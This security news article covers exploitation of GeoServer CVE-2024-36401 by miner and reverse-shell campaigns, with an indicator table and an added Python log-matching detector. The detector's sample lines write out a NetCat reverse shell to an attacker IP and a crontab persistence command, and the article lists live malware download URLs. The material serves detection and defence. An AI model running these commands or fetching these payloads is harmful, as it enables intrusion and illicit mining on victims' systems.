A surge in cyberattacks leveraging the GeoServer Remote Code Execution (RCE) vulnerability (CVE-2024-36401) has been reported, with AhnLab Security Intelligence Center (ASEC) confirming active exploitation targeting both Windows and Linux environments.
GeoServer, a widely adopted open-source Geographic Information System (GIS) server written in Java, has become a high-value target for threat actors following the public disclosure of the RCE vulnerability in 2024.
Despite security advisories and public documentation, many GeoServer instances remain unpatched, creating fertile ground for malicious activity.
Twin Threats in South Korea and Beyond
Recent attack campaigns have been observed in South Korea, where cybercriminals have exploited unpatched GeoServer installations to execute PowerShell commands remotely and deploy NetCat and XMRig CoinMiner.

According to the ASEC report, these attacks begin with the delivery of malicious PowerShell scripts, such as “adminc.ps1,” that install NetCat, a legitimate network utility often abused as a remote shell.
By leveraging NetCat with the “-e” argument, attackers establish reverse shells to control compromised systems remotely, facilitating further malicious activity including data exfiltration and lateral movement.
The campaign’s primary monetization method appears to be the deployment of the XMRig CoinMiner, a popular tool for illicit mining of Monero cryptocurrency.
Attackers use both PowerShell and Bash scripts, tailored depending on the target operating system, to silently install and configure XMRig on the victim’s machine.

On Windows systems, a specific PowerShell payload is executed, downloading additional malicious scripts from a hardcoded external server.
For compromised Linux environments, Bash scripts are employed to terminate competing miners, deploy the XMRig miner, and ensure persistence through cron job registration.
This enables attackers to maximize mining uptime, siphoning computational resources from compromised hosts.
Notably, the threat actor’s infrastructure utilizes a range of distribution URLs and configuration files, including links hosted at 182.218.82.14.
Analysis of these scripts shows they facilitate both the initial infection vector and subsequent stages of the attack, such as fetching miner configuration files or new payloads.
The crypto mining pool and wallet information embedded within the scripts all point toward an organized, profit-driven operation.
Attacks Reflect Broader Campaigns
Reports from security vendors, including Fortinet and Trend Micro, have noted that multiple strains of malware (such as GOREVERSE, SideWalk, Mirai, Condi, and CoinMiner) have exploited CVE-2024-36401 in the wild.
Attackers have demonstrated a willingness to target high-value governmental and enterprise environments, most notably through spear-phishing and automated scanning.
The infection chain in recent South Korean cases closely mirrors tactics used in previous global attacks, underscoring a coordinated and evolving threat landscape.
As long as vulnerable GeoServer instances remain exposed to the Internet, organizations will face continued risk of exploitation.
Once compromised, systems not only suffer performance degradation due to unauthorized cryptocurrency mining but also face the danger of data theft and subsequent malware deployment enabled by tools like NetCat.
Security experts emphasize the urgent need for patching vulnerable GeoServer installations and monitoring for indicators of compromise associated with these attack campaigns.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| MD5 | 0b3744373c32dc6de80dfc081200d9f8 |
| MD5 | 310c17c19e90381114d47914bcb3ccf2 |
| MD5 | 523613a7b9dfa398cbd5ebd2dd0f4f38 |
| MD5 | 5e84c2bcca9486b6416a8b27ed4d845e |
| MD5 | 615b348974fb3b5aea898a172fadecf4 |
| URL | http://182.218.82.14/js/1/config.json |
| URL | http://182.218.82.14/js/1/gl.txt |
| URL | http://182.218.82.14/js/1/gw.txt |
| URL | http://182.218.82.14/js/1/s.rar |
| URL | http://182.218.82.14/js/1/startup.sh |
| IP | 107.180.100.247 |
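The article recommends monitoring for the indicators above and describes two behaviours worth flagging on their own: NetCat launched with the “-e” argument (reverse shell) and cron registration used for miner persistence on Linux. The following script is an added example, not code from ASEC or from the GeoServer project; it matches the page's IOC values (hashes, URLs, IP addresses) and those two behavioural patterns against log lines. The log format and every sample line are constructed for the example; a real deployment would feed it proxy, EDR or auditd records instead.

```python
import re
from typing import Dict, List

# IOC values taken from the article's table (ASEC). Matching is exact.
IOC_MD5 = {
    "0b3744373c32dc6de80dfc081200d9f8",
    "310c17c19e90381114d47914bcb3ccf2",
    "523613a7b9dfa398cbd5ebd2dd0f4f38",
    "5e84c2bcca9486b6416a8b27ed4d845e",
    "615b348974fb3b5aea898a172fadecf4",
}
IOC_URLS = {
    "http://182.218.82.14/js/1/config.json",
    "http://182.218.82.14/js/1/gl.txt",
    "http://182.218.82.14/js/1/gw.txt",
    "http://182.218.82.14/js/1/s.rar",
    "http://182.218.82.14/js/1/startup.sh",
}
IOC_IPS = {"182.218.82.14", "107.180.100.247"}

# Generic token extractors: 32-hex-digit hashes and dotted-quad IPv4 addresses.
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Behavioural patterns described in the article (not IOC values):
#  - nc/ncat/netcat invoked with "-e", i.e. a program bound to the connection.
#  - crontab manipulation or writes under /etc/cron*, used for miner persistence.
NETCAT_EXEC_RE = re.compile(
    r"(?:^|[\s/\\])(?:nc|ncat|netcat)(?:\.exe)?\s.*\s-e(?:\s|$)", re.IGNORECASE
)
CRON_RE = re.compile(r"\bcrontab\b|/etc/cron", re.IGNORECASE)


def check_line(line: str) -> List[str]:
    """Return the list of reasons a single log line should be flagged.

    Reasons are emitted in a fixed order (hash, url, ip, behaviour) so that
    results are deterministic and easy to assert on or diff.
    """
    reasons: List[str] = []
    for token in MD5_RE.findall(line):
        if token.lower() in IOC_MD5:
            reasons.append(f"md5:{token.lower()}")
    for url in sorted(IOC_URLS):
        if url in line:
            reasons.append(f"url:{url}")
    for ip in IPV4_RE.findall(line):
        if ip in IOC_IPS:
            reasons.append(f"ip:{ip}")
    if NETCAT_EXEC_RE.search(line):
        reasons.append("netcat-exec")
    if CRON_RE.search(line):
        reasons.append("cron-persistence")
    return reasons


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map the index of every flagged line to its reasons; clean lines are omitted."""
    hits: Dict[int, List[str]] = {}
    for idx, line in enumerate(lines):
        reasons = check_line(line)
        if reasons:
            hits[idx] = reasons
    return hits


# Constructed sample records (hypothetical format: timestamp, source, detail).
SAMPLE_LOGS = [
    "2025-08-01T10:12:03Z proxy: GET http://182.218.82.14/js/1/startup.sh 200",
    "2025-08-01T10:12:05Z process: nc.exe 107.180.100.247 4444 -e cmd.exe",
    "2025-08-01T10:12:07Z file: C:\\Users\\Public\\adminc.ps1 md5=0b3744373c32dc6de80dfc081200d9f8",
    "2025-08-01T10:12:09Z process: (crontab -l; echo '* * * * * /tmp/startup.sh') | crontab -",
    "2025-08-01T10:12:11Z proxy: GET https://example.org/index.html 200",
    "2025-08-01T10:12:13Z process: nc -z localhost 80",
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOGS).items():
        print(f"line {idx}: {', '.join(reasons)}")
```

The last two sample lines are deliberately benign (an unrelated URL and a NetCat port check without “-e”) to show that the behavioural rules do not fire on every NetCat invocation; in practice the cron rule in particular needs tuning against legitimate scheduled jobs, and the hash check only helps where a log source records file hashes.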